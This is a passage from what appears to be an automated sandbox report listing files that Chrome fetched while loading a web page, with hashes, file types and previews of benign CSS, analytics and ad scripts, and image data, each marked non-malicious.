                                                                                                                                                                                                                                                                                                                                                                          Preview:@charset "UTF-8";.html5-video-player{position:relative;width:100%;height:100%;overflow:hidden;z-index:0;outline:0;font-family:"YouTube Noto",Roboto,Arial,Helvetica,sans-serif;color:#eee;text-align:left;direction:ltr;font-size:11px;line-height:1.3;-webkit-font-smoothing:antialiased;-webkit-tap-highlight-color:rgba(0,0,0,0);touch-action:manipulation}.html5-video-player,.ytp-contextmenu{-ms-high-contrast-adjust:none;forced-color-adjust:none}.html5-video-player:not(.ytp-transparent),.html5-video-player.unstarted-mode,.html5-video-player.ad-showing,.html5-video-player.ended-mode{background-color:#000}.ytd-video-masthead-ad-primary-video-renderer .html5-video-player:not(.ytp-transparent),.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.unstarted-mode,.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.ad-showing,.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.ended-mode{background-color:transparent}.ytp-big-mode{font-size:17px}.ytp-autohide{cu
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):16791
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3410805844999
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:w/A85q1H6uy2rbqGIwYRe1qL/jfOqKE6uyBrbqGIwYGJ1VW/uaDqPN6uyIrbqGI3:mUhq9rX0q9jW/q9Z
                                                                                                                                                                                                                                                                                                                                                                          MD5:2ACBE5F071208346E8A939C0010E108B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B4E77F27521FD90D5DAB28138D4260BC0637AD79
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2E196C67C978071827A3BD1FDB989D0D8ED850BA0CD61F1CB97952B7BD589981
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:98282315EDF18CD19102C58370E786C71A81DD622CCC57FE60408D7C7BAB7C952A772B3A49C27F59677311BE8FBD50FCE894B27EF471BB9F67E4C591B964F5F0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://fonts.googleapis.com/css?family=Open%20Sans%3A400%2C600%7COpen%20Sans%3A400%2C500
                                                                                                                                                                                                                                                                                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Open Sans';. font-style: normal;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4006)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):156120
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.600369825716716
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:0oUApQJntnhFeCySYWuODTDBVC8l4C7Ud7jUzS5iV7la6hYIJRDX7NJqhoTDRsLv:0oUAp8tnhFeCySYWuOD3TC8l4C7E7jUM
                                                                                                                                                                                                                                                                                                                                                                          MD5:B0B64EACA4D19B9D81D625BCCB9421F1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:60228C91407E5173A0171E2333D04A5F328039D6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:00362170DE0B6AE7661ED3837A840188F5B7A77E0C2BD524F3F5ECBAD6C89AA9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:ED9A174825D3F6D6AFD1A6B0672BF8FF13B5AE74A18C4F9A4FC8F98EE876451836D0C4A7D9AEE26FC2489C10FB3FEF0E8028ACD1A807223927631882949C570A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(sttc){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ha(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ia(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"$"
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):76
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.712267849228261
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:xPXhdnPKwTS247uNUCBoSQoTiY:xPxBPy247uNae
                                                                                                                                                                                                                                                                                                                                                                          MD5:33F4B5B5AD83BD19348C8D95A0FB6ECE
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5FDDFD04ADDB3BEE9F1649EFBCE6F7A26AF17961
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F8AE2F9B56207D753E6970CE60CEDECC40D1D91EA7C9282E0555EAD9BDE029F8
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:433F64B2E12D277260DB40989BFC2E4231323793773F944D5986761786C55D89A8EF1E74270AEB64F4A072B789D1478E5BECD9D71A6E1E66254C5DBBBDCBCB85
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSMwmOoXyune40hRIFDYOoWz0SBQ164U_gEgUNnE5K0BIFDa9aGJ4SBQ0SD_xqEgUNVbv1bw==?alt=proto
                                                                                                                                                                                                                                                                                                                                                                          Preview:CjYKBw2DqFs9GgAKBw164U/gGgAKBw2cTkrQGgAKBw2vWhieGgAKBw0SD/xqGgAKBw1Vu/VvGgA=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 2500x1667, components 3
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):297460
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.974092799108416
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:ggByK3iSjFApsiE4A3nbv1atPffPGUGNej42z6tBpMdeI1O:giQ5d+7MFffPwNej428rMYF
                                                                                                                                                                                                                                                                                                                                                                          MD5:FFC00BD671F7C2D4E675D335957C9464
                                                                                                                                                                                                                                                                                                                                                                          SHA1:AE7191139BD8892E80B92EB105790FE20519E5E9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:91C3F7ADA9D27DE6D3CD6055D2BDEF9D49AE58F873156B03FCB5CA4C9E913E95
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:28B5807B32CD7A104B6EE0C919BAECE7BDD352B5A30B87136FF8CA75165565ABE245F84D0526C25D28E6E885B6A779EC369F41A2AF1ED753EA35662195B076A7
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"................................................................................<....j.25.+".kRB.*.P....u.Me......7.........=<..g..y.. ...z..;..s.b<..3`..o.c.>.:L...,%..9.8.W.y......C.V.3.5.s7..7.2...<.sk6.(.P.:.....c.{~..>.o...........==8t..q...$.1...<..wR.1.......P.S3..3.+..3S........5...:D..9.31.k:...e.....|.....h..B..,%..P....B...C-.h...RP.D.Y...[.`...B.%.2M%..ft1t0..y\5.43t.B.3P..7T...l.R[RZ....(..R R@H.Kj.....PX...".B.,...K,w..o_.............g.x.<Z.W...u.../....O..^.....5.}..=..SV.K...T.L_+..<..p..p..........z[".%.49...}..?>.ayb={.n.y.y.W...:....k\.\...."..gc...b=.........O...zn}..u.}...e."..3y.M.q..j......V...De.....;b3...H.&...$..W.j.,.....r....g;..,.......(...U.RZ....R....,.e".Z.....Q..,....,.....Y(...,Md.!n...e..T.".B.(.r..@EK.,..........r[..+".$...t..O_...=..|~...xk.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://td.doubleclick.net/td/ga/rul?tid=G-KLDE7YGZXK&gacid=1437732794.1728897184&gtm=45je4a90v879629933z8810608771za200zb810608771&dma=0&gcs=G111&gcd=13r3r3r3r5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101686685&z=888808190
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (12116)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12208
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.322233629666089
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:ypoEnxEg+b7UPfVjrPimqafYizqlfRsYiqvt1RqEy2H2HBcSjENdVGyhVobFzc12:ypDxXq7UXVjr6mqMzq+qvFqEy2H2OSjR
                                                                                                                                                                                                                                                                                                                                                                          MD5:3EF0DEDA0631561665E95645DAF500A2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9ABF2E44065B0AD3E0E2ED0EF9678E3CC92DEBA7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:42C7E51D284CD7256CAF3BFEBF641141876657EA0D6E5588AC7E69DCE1E9CF7E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C7DC8E5BDB466DC5305A833A7F2AD49ED7A60CC5B50A24373FF1BF63E96D1455192C990A8EF2B9B36EE9151F0791511D3974547A313900F89AF6B0C34D83F71B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(e){var t={};function n(s){if(t[s])return t[s].exports;var o=t[s]={i:s,l:!1,exports:{}};e[s].call(o.exports,o,o.exports,n);o.l=!0;return o.exports}n.m=e;n.c=t;n.d=function(e,t,s){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:s})};n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"});Object.defineProperty(e,"__esModule",{value:!0})};n.t=function(e,t){1&t&&(e=n(e));if(8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var s=Object.create(null);n.r(s);Object.defineProperty(s,"default",{enumerable:!0,value:e});if(2&t&&"string"!=typeof e)for(var o in e)n.d(s,o,function(t){return e[t]}.bind(null,o));return s};n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};n.d(t,"a",t);return t};n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)};n.p="//static.hsappstatic.net/HubspotToolsMenu/static-1.354/";n(n.s=3)}([function(e,t){e.exports="//static
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 300 x 250, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):14864
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9557724476880765
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:0y2gQr+e6SLy11r/FLM3ik7DmLBc3xrJZ3CWci9G:HY6yLyTr/pM3d7DmLW3xdZO
                                                                                                                                                                                                                                                                                                                                                                          MD5:715C6EE13F857D44527273C8468B1164
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A77FD8400CABCA2A92D0B34E68C6E6A6D0EFA0E9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0F7E0CFB6D530C55022148DDCDB56488B7555C33BA634AACE1248A64AEEFC917
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:220F37F17F5FF8A95ED15F36227922B15F7592321B1899FBB84DC7DC81CF4C458793E07FCB53DDA0CF79A1F5F95287044E0F54444441ABABA42D91389E38F549
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...,................sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx..{|..........I.$....&.Q..V./T.E./..hK..(...mU..PE.Z....*.*..... ..H@.U0$$.r!d...^.<.?..d...$&.....W.9{.....s.s.s...$..y0.+ ...".HLF.P"1.)B..d..%...".HLF.P"1..... 4M+--..S.....Z,.V;]3..x....QU....GDD.]#..s,........o***.{..i.N.*..v...M{..Z......?..#....Z.t..].~....3.G..=z....6.F.jL......k...l?...G...._:.......bUU.N...+...TTT..6...p.@qqq\\..o....w..Z......k......9]3.n..g......?......+....l..5...p8.^..(...jEE..iV.....{.ILLLII.........x.@Q.M..F|||...`.Q..\8~.x+T..O>..;>...k....N.\...w......_.d..u.....BNo..F..O.2EU......n...[.hQ..X.z5.....j...-^.....?--...?.a.3...&''.....W_m`.a..Z.*>>>!!a...s...... ..f........[.....|...'N....../..399..k...+.......<s.L.X......_.{.V;]..../.@YY..u.x<v...._.hQDD...?...n..|.f.....%.....?DTRR..#F.hMW{.}....pq...X.......C.[.V..=|.........qB........b...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):66849
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.321800177669433
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:RJeUwT7hpwNFHM9ZK0BK01QYTZ02LKVsdmpyKcicZ:RIT7ss9ZKAKBYj8wKcHZ
                                                                                                                                                                                                                                                                                                                                                                          MD5:F2E1FFA6276B8D2306CA9912344ADA2E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CA3F4C3FEBDBA84EBED851ED83E0B9A84F748441
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CE12B015F2F5F7FCAA38A61E2C04217CAFE5D30F10B989A36A5206EF67C852E9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9DE1427A3E0A0F08DA7A63C35F82E9B7AA499CD236673389C44E8FDC4E57EDF16439B1BBFD97B64BC3B6A3011411E68334EC66EAB52E5926F66623B22F07E192
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://connect.facebook.net/signals/config/283945248938426?v=2.9.170&r=stable&domain=get.managedmethods.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112
                                                                                                                                                                                                                                                                                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4006)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):162042
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.597554550577175
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:0oUApQJntnhFeCyBYWuODSDBVC8l4C7ld7jUzS5iV7la6hYIJRDX7NJqhoTDRsLR:0oUAp8tnhFeCyBYWuOD8TC8l4C7/7jUO
                                                                                                                                                                                                                                                                                                                                                                          MD5:F9D031CC16337BE1480EC34C00182C12
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6595CF87AC351D325A81C4B16B0A0F7140FD9300
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:94684472FF0F0C0372B8AEFAA533369D26F25720EB2A53D6776198AB8F704C5C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D2E7ED87C505D639A287C060D523085A97FDF87E45E83C1E00E349ABF0C9E7839A90A3976AE37EBD8D99E8FC1683D99C3650CE6565F3A8EA396480F404503E0C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(sttc){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ha(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ia(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"$"
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):231864
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.458039173946496
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:nfLeYH8At6JK37OeR8NteGvQ+AMPpgArl0xYu5s713TW:nfLeYc+6JaH8N7QQGArHu5s713K
                                                                                                                                                                                                                                                                                                                                                                          MD5:40283CFC473AFBE1D4ABBA7E6C809885
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8A32CB88D9F537B02582DF17A5BB11C2087937F6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:48BA1993011DB4834882D81B2153753437607292F704A6543D4466C0F6D1372A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DABD9FD4CC3FB4FF3EBC2C3529E602E91939DDB1F42C2D7E70188DFC3262548922EA45C96691D567F2C777D393B5CE7162B5BD4C2054B33A03856BBEA1C1A0E3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (6187)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):6298
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3850652696715375
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:u8nME4+xIW/ksk6n15/AgxUaV4Xi4cLAUd9qi0n8gXsdBt4xjDEYrLm:pxr6W/kL6L/AOUk4GLMV8IsqEYr6
                                                                                                                                                                                                                                                                                                                                                                          MD5:DF55045BC18928673797EC8F36531CE2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:79B464E7E4E72389AA94918CDE3F36876508A847
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:86687F3E5F5AFDCF3625C8DDE9300BB27A5715AE747F119A1A4C8F89064C254C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8AA2A2B9668A62536297CDB50816226541884ED5BC2C44C8B0A9326A013A3360573A9AA4DDA21FE7B6B8E61160B91D95DD73E97FC97C7AF595D74ABED1902BC1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://js.hsadspixel.net/fb.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(e){var n={};function t(o){if(n[o])return n[o].exports;var i=n[o]={i:o,l:!1,exports:{}};e[o].call(i.exports,i,i.exports,t);i.l=!0;return i.exports}var o=[{name:"head-dlb/bundle.production.js",path:"head-dlb/static-1.1137/bundle.production.js",ids:{}}];t.dlbpr=function(e,n){var i=o[e];if(!i.r){i.r=window["__webpack_require_"+i.name+"__"];if(!i.r)throw new Error("dlb "+i.name+" not loaded");i.r.linkDlb(t,i.ids)}return i.r(n)};t.m=e;t.c=n;t.d=function(e,n,o){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:o})};t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"});Object.defineProperty(e,"__esModule",{value:!0})};t.t=function(e,n){1&n&&(e=t(e));if(8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);t.r(o);Object.defineProperty(o,"default",{enumerable:!0,value:e});if(2&n&&"string"!=typeof e)for(var i in e)t.d(o,i,function(n){return e[n]}.bind(null,i));return o};t.n=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):86927
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.289226719276158
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:jLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6t3:5kn6x2xe9NK6nC69
                                                                                                                                                                                                                                                                                                                                                                          MD5:A09E13EE94D51C524B7E2A728C7D4039
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
